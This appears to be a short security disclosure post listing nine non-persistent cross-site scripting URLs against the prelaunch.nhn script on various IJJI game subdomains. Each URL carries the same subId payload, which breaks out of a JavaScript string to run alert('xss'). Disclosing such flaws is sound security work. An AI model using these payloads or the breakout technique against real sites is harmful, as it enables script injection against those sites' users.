Type: Non-persistent
Criteria: None
Thus begins the final 4 days of this experiment; hopefully ending with a bang.
This post will disclose 9 seperate vulnerabilities in the prelaunch.nhn script used to communicate with the various plugins to launch one of the many games offered on the IJJI service.
1) Top-level
http://www.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
2) www2
http://www2.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
3) Huxley:The Dystopia
http://huxley.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
4) Soldier Front
http://sfront.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
5) GunZ
http://gunz.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
6) Drift City
http://drift.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
7) Lunia
http://lunia.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
8) Game
http://game.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
9) Events
http://event.ijji.com/common/prelaunch.nhn?subId=%27);}alert(%27xss%27);function%20init(){return;//
They clearly all exploit the same parameter, as they share the same script. I plan to writeup better descriptions in a seperate post.
